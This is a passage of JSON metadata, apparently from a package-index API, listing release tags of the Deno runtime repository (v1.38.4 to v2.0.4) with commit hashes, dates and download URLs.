2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_